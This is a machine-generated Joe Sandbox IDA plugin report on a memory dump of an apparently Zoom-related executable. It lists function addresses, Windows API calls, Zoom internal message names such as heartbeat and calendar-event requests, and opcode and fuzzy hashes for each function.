                • Opcode ID: 828d29a21c00feb997f336aed91eb819871e31acbba44db4814cb490323ae572
                • Instruction ID: 5420a1a1d87273c11430b73ca1e1a16114412e7dfaf627e0a5f1b02c4a5c4358
                • Opcode Fuzzy Hash: 828d29a21c00feb997f336aed91eb819871e31acbba44db4814cb490323ae572
                • Instruction Fuzzy Hash: D1E0D8B4A4038067D7307B149C45B5E35A49B5071BF504539F2415B3D3CBF48940EBB5
                APIs
                • __EH_prolog3.LIBCMT ref: 00C70067
                • ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.heartbeat.request,00009CE2,Param,00000004), ref: 00C70082
                  • Part of subcall function 00C5D540: __EH_prolog3.LIBCMT ref: 00C5D547
                  • Part of subcall function 00C8710B: __EH_prolog3_GS.LIBCMT ref: 00C87112
                  • Part of subcall function 00C8710B: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8712F
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8715D
                  • Part of subcall function 00C8710B: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting), ref: 00C8719D
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting), ref: 00C871CC
                  • Part of subcall function 00C8710B: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C8721F
                  • Part of subcall function 00C8710B: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C8723C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: Param$com.zoom.app.assistant.heartbeat.request
                • API String ID: 4281283084-1241254243
                • Opcode ID: aa78c453cfb9340e45e32a2bb039f936ed2efb617a612d1f674754c9e369c1d6
                • Instruction ID: 2f4f130c1132991a7b5a87ddd194a08f0f3862a1fcb05164768b62d43c13fbbc
                • Opcode Fuzzy Hash: aa78c453cfb9340e45e32a2bb039f936ed2efb617a612d1f674754c9e369c1d6
                • Instruction Fuzzy Hash: D3E0D8F0A4034097D3207B154C4AB1E66A4AB40B1AF948429B1515F3C2CBF48941EF79
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E007
                • ??0?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.sip.check.nomadic.911.request,00009D1A,Bssid,00000004), ref: 00C6E022
                  • Part of subcall function 00C5D270: __EH_prolog3.LIBCMT ref: 00C5D277
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: Bssid$com.zoom.app.assistant.sip.check.nomadic.911.request
                • API String ID: 3166440930-2941019768
                • Opcode ID: a9ecb7359c60f8ae7bd9b723a5307c4e1be7286c6221f626436a221614385dee
                • Instruction ID: 3a35a229f0827f7e0cb8aba0b7c5a9ba3dfc3eb4a9f57a6049e16762f365d96c
                • Opcode Fuzzy Hash: a9ecb7359c60f8ae7bd9b723a5307c4e1be7286c6221f626436a221614385dee
                • Instruction Fuzzy Hash: 96E0DFB5A10380E7CB307B148C45B1EA6F4AB99B16F000529B6029F3D2CBF88884DB79
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E1E7
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.control.system.load.request,00009D12,ConfigContent,00000004), ref: 00C6E202
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: ConfigContent$com.zoom.app.assistant.control.system.load.request
                • API String ID: 3166440930-1071028234
                • Opcode ID: ae365f31e668033372e063e6e75b24d4939b74ac590c8ca6e438adc4b4fc5c19
                • Instruction ID: 514aa389d2e177041a006920e6092d884bae23a73f9bf4e92a636989ba7c03e7
                • Opcode Fuzzy Hash: ae365f31e668033372e063e6e75b24d4939b74ac590c8ca6e438adc4b4fc5c19
                • Instruction Fuzzy Hash: 86E020B49003C1ABC720AB109D49B1E77B4DB40B16F40452DB2055F3D2CBF44C44D7B9
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E187
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.cec.standby.response,00009CDE,Result,00000004), ref: 00C6E1A2
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: Result$com.zoom.app.assistant.cec.standby.response
                • API String ID: 4281283084-2366485463
                • Opcode ID: 28965fc7cbd58ee730d32d40c003d14af5c5135106448d90c7f5129fe2586243
                • Instruction ID: 0c6282c39990ef8ccdf17a8ef47f78f2ddf68bd40947b5e9450fee25cfc73a1f
                • Opcode Fuzzy Hash: 28965fc7cbd58ee730d32d40c003d14af5c5135106448d90c7f5129fe2586243
                • Instruction Fuzzy Hash: 3FE0D8B0A50380A7D710BB158C45B5E26A4DB40B59F84447CB1045F383CBF44801EB74
                APIs
                • __EH_prolog3.LIBCMT ref: 00C70187
                • ??0?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.app.pt.notify.bandwidth.limit,00002750,BandwidthInfo,00000004), ref: 00C701A2
                  • Part of subcall function 00C5D270: __EH_prolog3.LIBCMT ref: 00C5D277
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: BandwidthInfo$com.Zoom.app.pt.notify.bandwidth.limit
                • API String ID: 3166440930-2443653156
                • Opcode ID: 31132edd311b04f33274948c24adf65149fa588a17dc0082e10f17b2f1e1ff3f
                • Instruction ID: dba8671f2dec36f07308827c670e680f9cef78ae4e568375d14447e13b0e9b21
                • Opcode Fuzzy Hash: 31132edd311b04f33274948c24adf65149fa588a17dc0082e10f17b2f1e1ff3f
                • Instruction Fuzzy Hash: A4E0D8B4A003A0A7E7207B104C85B1FB6B49744B55F504628B2055A3D2CBF48888D778
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E127
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.cec.poweron.response,00009CDC,Result,00000004), ref: 00C6E142
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: Result$com.zoom.app.assistant.cec.poweron.response
                • API String ID: 4281283084-2854840679
                • Opcode ID: 7a736e8a389f06021e995381c6784aff212ebc12461b174785ef49688c38b500
                • Instruction ID: 3c714a1f865456eaa4ce9c3d52140a29bdcb2157fca32adf63ad655126ab028e
                • Opcode Fuzzy Hash: 7a736e8a389f06021e995381c6784aff212ebc12461b174785ef49688c38b500
                • Instruction Fuzzy Hash: 07E0DFB0A00380A7EB20BB108C89B2F26E4AB80B59FA4443CB2045B382CFF44841F778
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74127
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.app.notify.pt.conf.my.statuus,0000277A,invite_bypass_wr,00000004), ref: 00C74142
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.Zoom.app.notify.pt.conf.my.statuus$invite_bypass_wr
                • API String ID: 4281283084-636401198
                • Opcode ID: d969c54e044635f33c401650cd4291e7b2fa7c293c8306590b40c32a19569e2a
                • Instruction ID: 59f9f2538e9aeb63ca3b72f8970c22bf98ae44925811591eda4ea8a604c83d3d
                • Opcode Fuzzy Hash: d969c54e044635f33c401650cd4291e7b2fa7c293c8306590b40c32a19569e2a
                • Instruction Fuzzy Hash: 1EE0D8B0A143A467F720BF248C4572E26A4AB50B1AF944428B1085B3C1CFF44941D774
                APIs
                • __EH_prolog3.LIBCMT ref: 00C70127
                • ??0?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.upload.pbx.real.time.monitor.log.request,00009CE6,Log,00000004), ref: 00C70142
                  • Part of subcall function 00C5D270: __EH_prolog3.LIBCMT ref: 00C5D277
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: Log$com.zoom.app.assistant.upload.pbx.real.time.monitor.log.request
                • API String ID: 3166440930-2276195319
                • Opcode ID: eac086b10dc27b673be5dadd34d73741126dd0e9614b83634da373892f5034d8
                • Instruction ID: d8afcbfa93809e95cd2ad6619dd14920fc36e872e4ac54a23f59b19c6a564bdc
                • Opcode Fuzzy Hash: eac086b10dc27b673be5dadd34d73741126dd0e9614b83634da373892f5034d8
                • Instruction Fuzzy Hash: 94E0DFF0E10380A7DB207B148D45B2E66F4AB48B5AF40442CB6025B3D2CBF48888DBB9
                APIs
                • __EH_prolog3.LIBCMT ref: 00C72137
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.recordingstatechange.notify,00009E8B,RecordingState,00000004), ref: 00C72152
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: RecordingState$com.zoom.app.cci.ccivideo.recordingstatechange.notify
                • API String ID: 4281283084-4115089828
                • Opcode ID: 23d20966b11d54588a9243bd58b58f2b1e263473a9f67f2aec0bddc409a9539a
                • Instruction ID: a356897b0e0fc5cb5a2281655cc543af865bf83b91173b780b3a22a05002bb4a
                • Opcode Fuzzy Hash: 23d20966b11d54588a9243bd58b58f2b1e263473a9f67f2aec0bddc409a9539a
                • Instruction Fuzzy Hash: EBE0D870900380A7D724BF248C0572E26A4FB80B55F984528B2085B382CFF44841E774
                APIs
                • __EH_prolog3.LIBCMT ref: 00C682B7
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.app.pt.saveFileInMeetingChat,0000274F,result,00000004), ref: 00C682D2
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Similarity
